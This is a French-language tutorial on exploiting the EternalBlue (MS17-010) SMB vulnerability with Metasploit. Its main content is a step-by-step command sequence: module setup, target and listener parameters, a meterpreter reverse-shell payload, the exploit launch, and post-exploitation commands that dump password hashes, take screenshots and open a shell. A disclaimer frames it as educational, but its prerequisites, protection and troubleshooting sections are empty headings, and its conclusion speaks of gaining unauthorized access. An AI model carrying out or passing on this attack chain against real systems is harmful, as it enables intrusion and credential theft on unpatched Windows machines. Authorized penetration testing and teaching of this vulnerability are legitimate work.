⚠️ Avertissement

Ce tutoriel est fourni à des fins éducatives uniquement. L'exploitation de vulnérabilités sur des systèmes sans autorisation explicite est illégale et peut entraîner des poursuites judiciaires. Utilisez ces techniques uniquement sur des systèmes pour lesquels vous avez l'autorisation expresse du propriétaire. Ce tutoriel doit être utilisé dans le cadre de tests de pénétration légitimes afin d'améliorer la sécurité.

Exploitation de la Vulnérabilité SMB EternalBlue

Ce tutoriel détaillé vous guidera à travers les étapes nécessaires pour exploiter la vulnérabilité SMB EternalBlue en utilisant Metasploit. Cette vulnérabilité, également connue sous le nom de MS17-010, a été largement utilisée dans des attaques telles que WannaCry.

Introduction

EternalBlue est une vulnérabilité dans le protocole SMB de Microsoft. Elle permet à un attaquant d'exécuter du code arbitraire à distance sur une machine vulnérable. Cette attaque est particulièrement puissante car elle ne nécessite aucune interaction de l'utilisateur cible.

Comprendre EternalBlue

EternalBlue exploite une faille dans le protocole SMBv1 de Windows. Il s'agit d'une vulnérabilité de type "remote code execution" (RCE) qui permet à un attaquant d'exécuter du code arbitraire à distance. Microsoft a corrigé cette vulnérabilité en mars 2017 via le patch MS17-010, mais de nombreuses machines non mises à jour restent vulnérables.

Prérequis

Étape 1: Configuration de Metasploit

Pour commencer, lancez Metasploit en utilisant la commande suivante :

msfconsole

Étape 2: Recherche du Module EternalBlue

Utilisez la commande suivante pour rechercher le module EternalBlue dans Metasploit :

search eternalblue

Étape 3: Configuration du Module

use exploit/windows/smb/ms17_010_eternalblue
set RHOST [IP de la cible]
set LHOST [Votre IP]
set LPORT 4444

Pourquoi ce Payload ?

Nous utilisons le payload windows/x64/meterpreter/reverse_tcp car il permet de créer une connexion "reverse shell". Cela signifie que la machine cible initie la connexion vers notre machine (LHOST) via le port 4444 (LPORT), nous permettant de prendre le contrôle du système à distance.

Étape 4: Sélection du Payload

set payload windows/x64/meterpreter/reverse_tcp

Étape 5: Lancement de l'Exploit

exploit

Étape 6: Post-Exploitation avec Meterpreter


            sysinfo        # Affiche les informations système
            getuid         # Affiche l'identifiant de l'utilisateur
            hashdump       # Récupère les hashes de mots de passe
            screenshot     # Prend une capture d'écran
            shell          # Ouvre une session shell sur la cible
        

Comment se Protéger Contre EternalBlue

💡 Dépannage

Conclusion

Ce tutoriel vous a montré comment exploiter la vulnérabilité SMB EternalBlue pour obtenir un accès non autorisé à une machine vulnérable. Rappelez-vous de n'utiliser ces techniques que sur des systèmes pour lesquels vous avez une autorisation explicite. Utilisez ces connaissances pour améliorer la sécurité des réseaux et des systèmes.